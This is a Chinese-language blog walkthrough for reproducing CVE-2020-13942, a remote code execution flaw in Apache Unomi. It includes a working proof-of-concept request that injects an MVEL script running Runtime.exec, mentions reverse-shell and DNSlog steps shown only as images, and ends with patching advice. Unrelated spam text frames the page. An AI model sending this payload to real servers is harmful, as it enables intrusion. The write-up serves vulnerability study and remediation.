中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

發布時間:2021-12-29 15:34:49 來源:億速云 閱讀:139 作者:柒染 欄目:安全技術

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

CVE -2020-13942 (Apache Unomi 遠程代碼執行漏洞)

一、漏洞描述:

Apache Unomi是一個Java開源平臺,這是一個Java服務器,旨在管理,潛在顧客和訪問者的數據,并幫助個性化體驗。Unomi可用于在非常不同的系統(例如CMS,CRM,問題跟蹤器,本機移動應用程序等)中集成個性化和配置文件管理。

在Apache Unomi 1.5.1版本之前,攻擊者可以通過精心構造的MVEL或ONGl表達式來發送惡意請求,使得Unomi服務器執行任意代碼,漏洞對應編號為CVE-2020-11975,而CVE-2020-13942漏洞是對CVE-2020-11975漏洞的補丁繞過,攻擊者繞過補丁檢測的黑名單,發送惡意請求,在服務器執行任意代碼。

二、影響版本:

Apache Unomi < 1.5.2

三、漏洞復現:

訪問頁面樣式

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

POC:

POST/context.jsonHTTP/1.1Host: localhost:8181User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Content-Length: 486{"filters": [ {"id":"boom","filters": [ {"condition": {"parameterValues": {"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");" },"type":"profilePropertyCondition" } } ] } ],"sessionId":"boom"}

抓包poc執行:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

查看DNSlog記錄:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

嘗試反彈shell:

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

執行反彈shell命令腳本:

獲取shell

Apache Unomi 遠程代碼執行漏洞CVE -2020-13942如何復現

四、修復方案

1、盡可能避免將用戶數據放入表達式解釋器中。

2、目前廠商已發布最新版本,請受影響用戶及時下載并更新至最新版本。官方鏈接如下:

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宁河县| 柯坪县| 萨迦县| 瑞昌市| 章丘市| 丹巴县| 额尔古纳市| 禄丰县| 孟津县| 霞浦县| 中西区| 永福县| 遂昌县| 攀枝花市| 宜阳县| 阜新| 含山县| 昆明市| 石台县| 新田县| 和政县| 南涧| 洛阳市| 博兴县| 万山特区| 孝义市| 定州市| 连云港市| 泰宁县| 方正县| 东乌珠穆沁旗| 车险| 青龙| 永州市| 舒城县| 西贡区| 札达县| 长丰县| 太原市| 奉节县| 新余市|